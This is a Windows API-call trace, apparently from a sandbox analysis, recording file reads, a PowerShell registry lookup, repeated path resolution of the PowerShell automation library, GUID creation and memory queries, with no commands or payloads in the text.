	[0585.620] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.628] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.629] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0585.629] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.281] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.281] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.282] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.282] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.282] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.283] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.283] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.283] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.284] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.284] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.284] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.285] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.285] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.285] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.286] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.286] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.286] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.287] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0587.287] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0xf37, lpOverlapped=0x0) returned 1
	[0587.287] ReadFile (in: hFile=0x2e4, lpBuffer=0x340efa7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340efa7*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0587.288] ReadFile (in: hFile=0x2e4, lpBuffer=0x340f908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x340f908*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0587.288] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e4) returned 0x0
	[0587.288] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0587.288] CoTaskMemAlloc (cb=0x5a) returned 0x216490
	[0587.288] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x216490, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0587.288] CoTaskMemFree (pv=0x216490) 
	[0587.288] RegCloseKey (hKey=0x2e4) returned 0x0
	[0587.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0587.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0587.305] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x60b3462b, Data2=0x590b, Data3=0x4be1, Data4=([0]=0x99, [1]=0x13, [2]=0x44, [3]=0x82, [4]=0xdc, [5]=0xe4, [6]=0xf, [7]=0x13))) returned 0x0
	[0587.306] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x9eeb18c4, Data2=0x4012, Data3=0x4f8b, Data4=([0]=0x98, [1]=0xb4, [2]=0x90, [3]=0x1, [4]=0xb, [5]=0x71, [6]=0xdf, [7]=0x20))) returned 0x0
	[0587.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0587.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0587.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0587.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.352] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x787ac15d, Data2=0xa3f0, Data3=0x4a56, Data4=([0]=0xbe, [1]=0x5a, [2]=0xcf, [3]=0x9d, [4]=0x6d, [5]=0xe, [6]=0x46, [7]=0x3b))) returned 0x0
	[0589.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.708] VirtualQuery (in: lpAddress=0xab2a0, lpBuffer=0xac160, dwLength=0x30 | out: lpBuffer=0xac160*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.709] VirtualQuery (in: lpAddress=0xab330, lpBuffer=0xac1f0, dwLength=0x30 | out: lpBuffer=0xac1f0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.710] VirtualQuery (in: lpAddress=0xabab0, lpBuffer=0xac970, dwLength=0x30 | out: lpBuffer=0xac970*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.712] VirtualQuery (in: lpAddress=0xabab0, lpBuffer=0xac970, dwLength=0x30 | out: lpBuffer=0xac970*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0590.713] VirtualQuery (in: lpAddress=0xabab0, lpBuffer=0xac970, dwLength=0x30 | out: lpBuffer=0xac970*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0590.716] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x4ae770da, Data2=0x555b, Data3=0x4fd9, Data4=([0]=0x86, [1]=0x79, [2]=0xb9, [3]=0xe7, [4]=0x5a, [5]=0x52, [6]=0x14, [7]=0xa8))) returned 0x0
	[0590.719] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7f6fdd0f, Data2=0x485a, Data3=0x46ae, Data4=([0]=0x9a, [1]=0xe4, [2]=0x9, [3]=0xfc, [4]=0x3e, [5]=0x87, [6]=0x22, [7]=0x1b))) returned 0x0
	[0590.720] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x2327c703, Data2=0x5bc4, Data3=0x4890, Data4=([0]=0x98, [1]=0x24, [2]=0x27, [3]=0x5b, [4]=0x1f, [5]=0x85, [6]=0x3d, [7]=0x28))) returned 0x0
	[0592.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
